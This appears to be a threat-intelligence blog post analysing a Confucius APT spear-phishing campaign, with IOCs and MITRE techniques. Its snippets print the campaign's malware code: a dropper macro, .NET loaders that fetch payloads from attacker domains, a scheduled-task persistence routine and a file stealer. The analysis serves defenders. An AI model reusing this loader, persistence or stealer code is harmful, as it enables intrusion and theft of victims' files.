Unraveling Confucius’ Espionage Campaigns

Background

Confucius, an Indian state-sponsored APT group, continues to target Defense and Government organizations in South-Asia, especially Pakistan. The primary purpose of the TA appears to conduct espionage campaigns and steal information critical to the operations of the targeted institutes.

In August 2021, the release of Amnesty International’s advisory on Pegasus Spyware by Israel’s NSO Group was the source of major unrest in the country’s politicians and other elite individuals. Capitalizing on this unrest, Confucius began to lure such individuals by means of a bi-partite email wherein the first email was a simple informational mail against Pegasus and the second email contained an encrypted document (with the password of the document mentioned in the same email). Technical analysis of the document and the entire attack chain points towards a well-thought espionage campaign, a new for Confucius.

In late September 2021, the same campaign was re-run wherein the only changes we witnessed were the domains which were used for payload acquisition and data exfiltration. The flow of the whole attack chain can be seen below:

Figure 1: Execution flow of complete attack chain

Reports of a potential intrusion by Confucius were first disclosed by researchers on Twitter. Analysis of the campaign by our researchers is discussed in detail in the following sections:

Macro-enabled Word Document

Confucius heavily relies on Microsoft Word documents to deliver spear-phishing emails to their targets. Previously, these Word documents had external relationships to malicious templates (for template injection). More recently, the group appears to have made a switch to using malicious VBA macros.

Using the Document_Open method, the macro executes two functions; one to write the binary to disk (eventually loading it) and the second to update the caption of an image embedded within the document. The function MyColor takes in the value of the Comments property of the active document, opens the handle to a file in the Temp directory, and writes the data (after converting it to binary) to disk.

Sub Mycolor()Dim prop As DocumentProperty  For Each prop In ActiveDocument.BuiltInDocument
Properties    If prop.Name = "Comments" Then      s = prop.Value    End If  Nextfnum = FreeFileFName = Environ("TMP") & "\skfk.txt"Open FName For Binary As #fnum  Put #fnum, , abc(CStr(s))Close #fnumfr = "'" & Environ("TMP") & "\skfk.txt" & "'"Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"CreateObje
ct("WScript.
Shell").Run Result, 0, TrueEnd Sub

Snippet 1: VBA Macros Embedded Inside Lure

Once written, the binary is loaded into memory using PowerShell’s implementation of the Reflection API (or more specifically, the LoadFile method in the class). The LoadFile method takes in one parameter which is the .NET assembly. Later, an object of Class1 is instantiated and the sadkj procedure is called.

.NET Downloader/Loader

Static analysis of the binary suggests that it is in fact a dynamic-link library (.NET assembly) with a modified ‘compile timestamp’ pointing to 2050. The function sadkj instantiates another object of the same class and attempts to call the function sdlfghjgks from it.

public void sadkj(){  string str = Path.GetTempPath() + "skfk.txt";    new Process    {      StartInfo =      {        FileName = "powershell.exe",        Arguments = "[Reflection.Assembly]::LoadFile('" + str + "');$t = New-Object Tysdf.Class1;$t.sdlfghjgks()",        WindowStyle = ProcessWindowStyle.Hidden      }    }.Start();    Environment.Exit(0);}

Snippet 2: .NET Loader

This function is interesting as it references a URL to acquire (what looks like another DLL masqueraded as a .TXT file) a file from the C2 infrastructure. To summarize the function, it downloads the .TXT file from the URL referencing the domain inshaaldom.xyz, loads the assembly by converting the ASCII payload to binary via the moon function, acquires the types from the assembly, instantiates them and dynamically invokes the ndmsbfl function from the recently acquired assembly.

public void sdlfghjgks(){  WebClient webClient = new WebClient();  string uriString = "https://inshaaldom.xyz/SowpnTdb.
txt";  try  {    string sweiorut = webClient.DownloadString(new Uri(uriString));    Type[] types = Assembly.Load(this.moon(sweiorut)
).GetTypes();    for (int i = 0; i < types.Length; i++)    {      object arg = Activator.CreateInstance(types[i]);      if (Class1.<>o__3.<>p__0 == null)      {        Class1.<>o__3.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.
RuntimeBind
er.Binder.InvokeMember(CSharp
BinderFlags.
ResultDiscarded, "ndmsbfl", null, typeof(Class1), new CSharpArgumentInfo[]        {          CSharpArgumentInfo.Create(CShar
pArgument
InfoFlags.None, null)        }));  ...}

Snippet 3: Payload Acquisition and Dynamic Invocation of Scheduler

.NET Task Scheduler  

Static analysis of SowpnTdb.txt (DLL) led us to identify some interesting strings. The embedded PDB path F:\Hacking Notes - Documents\Projects\project-05\SowpnTdb\SowpnTdb\bin\Release\
ILMerge\So
wpnTdb.pdb (in one of the intrusions from the campaign) indicated several projects were in-line to continue the attack campaign. Several meta-data fields of the binary pointed towards it being a Task Scheduler, likely acquired from the GitHub. Recon on GitHub pointed towards a .NET wrapper for the Task Scheduler API exposed by Windows which was a direct match of the codebase used by the Scheduler. This highlights the fact that Confucius utilizes open-source projects in their operations. We’ve also previously identified similar patterns of using open-source tools (OSTs) from their (potential) sister-group, Sidewinder.

Analysis of the function ndmsbfl suggests it downloads another DLL (jksdfhk.txt) from the server (same domain as before) and drops it to C:\ProgramData. Following that, a task titled Systemcheck is scheduled to run a PowerShell command every five minutes. Scheduled commands are the previously covered dynamic invocation calls with the Reflection API being used to load the recently dropped DLL.

public void ndmsbfl(){  new WebClient().DownloadFile(new Uri("https://parinari.xyz/Msdjkfh.txt"), "C:\\ProgramData\\jksdfhk.txt");  new TaskService();  TimeTrigger trigger = new TimeTrigger  {      Repetition = new RepetitionPattern(TimeSpan.From
Minutes(5.0), TimeSpan.FromDays(0.0), false)  };  string path = "C:\\Windows\\System32\\Windows
PowerShell\\
v1.0\\powershell.exe";  string arguments = "-windowstyle hidden -C $rk = \"\"\"C:\\ProgramData\\jksdfhk.txt\"\"\
[Reflection.Assembly]::LoadFile($rk);
$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()\" ";  TaskService.Instance.AddTask("
Systemcheck", trigger, new ExecAction(path, arguments, null), null, null, TaskLogonType.InteractiveToken, null);}

Snippet 4: .NET Task Scheduler

Final .NET Loader

The final .NET loader has similar operations to what we’ve witnessed in the previous loader binaries. Here’s a summary of the operations in this particular loader:

  • Downloads another payload (Rwlksdnasjd.txt) from the domain, inshaaldom.xyz (a DLL masquerading as a TXT file)
  • The payload is converted into binary
  • Classes are instantiated from the recently converted binary
  • The function, sdsdjkfhds, is dynamically invoked

public void Nasuyd(){  WebClient webClient = new WebClient();  string uriString = "https://parinari.xyz/Rwlksdnasjd.txt";  try  {    string st = webClient.DownloadString(new Uri(uriString));    Type[] types = Assembly.Load(this.Houn(st)).GetTy
pes();    for (int i = 0; i < types.Length; i++)    {      object arg = Activator.CreateInstance(types[i]);      if (Class1.<>o__1.<>p__0 == null)      {        Class1.<>o__1.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.
RuntimeBinder.Binder.InvokeMem
ber(CSharpBinder
Flags.ResultDiscarded, "sdsdjkfhds", null, typeof(Class1), new CSharpArgumentInfo[]        {          CSharpArgumentInfo.Create(CShar
pArgumentInfoFlags.None, null)        }));      }  ...}

Snippet 4: Final .NET loader

Stealer

Continuing the analysis with the last invoked function, sdsdjkfhds, the metadata of the DLL (Rwlksdnasjd.txt) and several network calls inside the DLL further strengthen the fact that it is in fact an uploader. A snippet of the function is listed below:

public void sdsdjkfhds(){  string userName = Environment.UserName;  List<string> pfhl = new List<string>();  string pattern = "*";  pfhl = this.Gpufh();  "C:\\\\Users\\\\" + userName;  string tdn = Environment.MachineName + "__" + userName;  this.CUD(tdn, 0);  foreach (string text in Directory.GetDirectories("C:\\Users\\"))  {    if (text != "C:\\Users\\Default" || text != "C:\\Users\\Public")    {      this.GF(text + "\\Documents\\", pattern, "Documents", pfhl);      this.GF(text + "\\Downloads\\", pattern, "Downloads", pfhl);      this.GF(text + "\\Desktop\\", pattern, "Desktop", pfhl);      this.GF(text + "\\Pictures\\", pattern, "Pictures", pfhl);    }  }  DriveInfo[] drives = DriveInfo.GetDrives();  char[] trimChars = new char[]  {    ':',    '\\'  };  foreach (DriveInfo driveInfo in drives)  {    if (driveInfo.Name != "C:\\")    {      this.GF(driveInfo.Name, pattern, driveInfo.Name.TrimEnd(trimChars), pfhl);    }  }  Environment.Exit(0);}

Snippet 5: Stealer and Uploader

Capabilities of the Stealer are:

  • Collect information of all local drives
  • Download a file of MD5 hashes (specific for the Machine and Username of the compromised workstation) from the C2 server
  • Find and ex-filtrate files with extensions TXT, PDF, PNG, JPG, ODS, DOC, XLS, XLM, ODP, ODT, RTF, PPT, PPTX, XLSX, XLSM, DOCX, JPEG
  • Files are hashed (MD5) before being ex-filtrated and compared against the MD5 hash list previously acquired from the C2 server. Files which have already been ex-filtrated are not uploaded to the server again

private void GF(string path, string pattern, string ufn, List<string> pfhl){  ...  try  {    list.AddRange(Directory.GetFiles(
path, pattern, SearchOption.TopDirectoryOnly));    foreach (string text in list)    {      ...      if (a == "txt" || a == "TXT" || a == "pdf" || a == "PDF" || a == "png" || a == "PNG" || a == "jpg" || a == "JPG" || a == "DOC" || a == "doc" || a == "XLS" || a == "xlm" || a == "XLM" || a == "xls" || a == "odp" || a == "ODP" || a == "ods" || a == "ODS" || a == "odt" || a == "ODT" || a == "rtf" || a == "RTF" || a == "ppt" || a == "PPT" || a2 == "xlsx" || a2 == "XLSX" || a2 == "xlsm" || a2 == "XLSM" || a2 == "docx" || a2 == "DOCX" || a2 == "pptx" || a2 == "PPTX" || a2 == "jpeg" || a2 == "JPEG")      {      list2.Add(text);      }    }          ...      foreach (string text3 in list2)    {      if (!(text3 == ""))      {        string item;        using (MD5 md = MD5.Create())        {          using (FileStream fileStream = File.OpenRead(text3))          {            item = BitConverter.ToString(md.Compute
Hash(fileStream)).Replace("-", "");          }        }        if (!pfhl.Contains(item))        {          list3.Add(text3);          list4.Add(item);        }      }    }  }  if (list3.Count != 0)  {    this.CUD(text2, 1);    ...  }    ...}

Snippet 6: Capabilities of the Stealer

Although the payload acquisition domain does encrypt its communication with the compromised host (via HTTPS), the exfiltration domain, thakithaiya.xyz uses the plain-text HTTP protocol to send/receive data from the C2 server. Similar to the earlier campaigns carried out by Confucius, the web pages are written in PHP (with random URIs and parameter names to collect usernames/machine name). Since the task is scheduled for a five minute run, the uploader runs the same routine over and over, collecting files and folders from the system, until terminated.

Indicators of Compromise

Following Indicators of Compromise were discovered during the course of our intrusion analysis:

File NameTypeHash
Ticket00073146.docm‍MD5
SHA1
SHA256
a91be9529d06cd4a6c06a01b5c595630
814367a04163802d5e124e599772c6a3b
a681a78
034cfe57d26cfea4139cf7bb387b9ba8f
8705e44d3868e5edc36af0f7a8aa5bf
Tysdf.dll (skfk.txt)‍MD5
SHA1
SHA256
ae3e8679df2976d31da858fd7af67185
4c6c04af547b7df04e3bdb3f69e812a3
0b200016
ea7a951dbd93d5ef6ca535820499da29
753331e1e8a38c6fef9398a57a679ef0
Msdjkfh.dll (jksdfhk.txt)‍MD5
SHA1
SHA256
5397cbaf89ff40a8b08004ac5164c8a0
17f1e33763cb6e5ae6b39f3f28bc695ac5
97ce7b
bf50438e10e8ed3eaa7949440a6ac4bd
c55305aa2bfe75fa1997feaf0cbc9d50
Rwlksdnasjd.dll (Stealer)‍MD5
SHA1
SHA256
457101ea5c30c53f9381d7e9aa6432a4
e554c0ef069fe5a49919bea560003cfccd
69f858
43698d70087aa875c4384b59cacd8eff5
6bd0bff3be20e69b98613ec5184b41f
SowpnTdb.txt (Scheduler)‍MD5
SHA1
SHA256
4461412acfc3988974355d4c1601d3f6
33596fbe26e556bb2610739f070b66a2c
f532eda
63ca532a13ff909b4b7f72b9a094fa3fc5
9713984f645664c95a66f14be5f96a
File Path
File Path Description
%Temp%\skfk.txt.NET DLL dropped by the Word document; used to load the next stage into memory
C:\ProgramData\
jksdfhk.txt
.NET DLL dropped by SownpnTdb.dll; used to load the next stage into memory
Scheduled Tasks
Task Name Task Occurence
SystemcheckEvery five minutes
Domains/IPv4 Addresses
Domain NameProtocolUsageIPv4 Address
thakithaiya.xyzHTTPExfiltration80.209.238.155
pirnaram.xyz HTTP‍Exfiltration34.98.99.30,62.77.153.51
inshaaldom.xyzHTTPSPayload Acquisition104.21.10.162,172.67.146.1
C:\ProgramData\
jksdfhk.txt
HTTPSPayload Acquisition34.98.99.30,104.21.86.125,
172.67.219.211
YARA Rules

Yara rules to detect the Loader and Stealer used by Confucius in their recent cyber-espionage campaigns can be found at our GitHub repository.

Tactics, Techniques and Procedures

Following tactics, techniques, and procedures are actively used by Confucius in their intrusions:

DomainIDNameDescription
T1598‍Gather Victim Identity Information‍Confucius extensively gathers the victim’s identifying information to target them via effective lures‍
T1583Acquire Infrastructure‍Confucius acquires new infrastructure (discussed in next techniques) a month before each new campaign‍
T1583.001Acquire Infrastructure: Domains‍Confucius typically registers two new domains as part of their infrastructure; one to acquire payloads from and another to ex-filtrate data to‍
T1583.004Acquire Infrastructure: Server‍Confucius acquires virtual private servers to acquire payloads from and ex-filtrate data to during the Command and Control phase‍
T1566Phishing/Spearphishing Attachment‍Confucius heavily relies on Spearphishing (attachments) to compromise their targets. Targeted emails in the past lured users into opening attachments (often encrypted; passwords being mentioned in the email’s content) by utilizing decoy documents including Payrolls, Pegasus (defenses against it), and others‍
T1053.005‍Scheduled Task/Job: Scheduled Task‍Confucius schedules a Task on the compromised system to re-execute the malicious payload (every five minutes)‍
T1036‍Masquerading‍Dynamic-link Libraries (.DLL) files used by Confucius to load the payload from subsequent stages was masquerading as .TXT (plain-text) files on the filesystem‍
T1083‍File and Directory Discovery‍The final-stage stealer deployed by Confucius extensively searches the filesystem for matches on particular file extensions and ex-filtrates the identified files to the C2 server‍
T1082‍System Information Discovery‍The final-stage stealer deployed by Confucius also collects information about the compromised system such as drives, machine name, and users for exfiltration and later downloading hash lists for comparisons‍
T1059.001Command and Scripting Interpreter: PowerShell‍Confucius heavily relies on the reflection API exposed by PowerShell to load/execute their DLLs in memory leaving minimal footprints on the compromised system’s disk‍
T1005‍Data from Local System‍Confucius collects data such as files and folders from the compromised system in an automated fashion to ex-filtrate to their server‍
T1071.001‍Application Layer Protocol: Web Protocols‍Confucius serves its command and control server using the web protocols, HTTP and HTTPS‍
T1573.002Encrypted Channel: Asymmetric Cryptography Confucius uses Asymmetric Cryptography to encrypt its communication over web protocols and communicate with the C2 server
T1041 Exfiltration over C2 Channel Confucius ex-filtrates data collected from the compromised system to the C2 channel
T1029Scheduled TransferScheduled jobs also implement a schedule to transfer/ex-filtrate files from the compromised system and acquire a hash file to match hashes against and exclude files which have already been delivered to Confucius’ C2 server

Operational Security Failure

While performing reconnaissance against the infrastructure of Confucius, we found a deviation from their normal pattern of operations. Confucius highly utilizes C2 domains bought from the registrar, GoDaddy, using different US-based addresses to do so. However, the primary C2 domain in the recent campaign, inshaaldom.xyz, and the C2 domain used in the campaign in August 2021, parinari.xyz, were both registered from Chandigarh, India. We consider this to be an operational mistake from the operators behind Confucius revealing their origin.

Figure 2: C2 domain registered in India deviating from usual domain registration pattern of Confucius

Outlook

The selection of techniques by Confucius are not very sophisticated at the moment along with some operational security failures however; analysis of the campaign highlighted the creativity of its operators and their potential to increase sophistication in the future.

Previous campaigns by Confucius utilized techniques like Template Injection in spear-phishing documents; However, the current campaign makes use of macros and an embedded PE in the comments of a picture inside the document. These minor changes in techniques suggest the group is actively looking to switch their tradecraft to avoid detections based on named rulesets.

Share the article with your friends

Related Posts

Blog
Ebryx forensic analysts identified an organized criminal group in the South-Asian region. The group utilized an ATM malware to dispense cash directly from the ATM tray.
May 22, 2023
3 Min Read
Blog
Cyber attacks are on the rise in 2022. Despite increased cybersecurity awareness, businesses have not been able to defend themselves from the rapidly changing threat landscape. Compared with the same
May 22, 2023
3 Min Read
Blog
Cybersecurity jobs are growing at a staggering rate and have shown no signs of stopping. According to the New York Times, an estimated 3.5 million cybersecurity positions remain unfilled globally.
May 22, 2023
3 Min Read

Have questions?
Let's talk.

Ebryx experts are ready to answer
your questions.

Contact us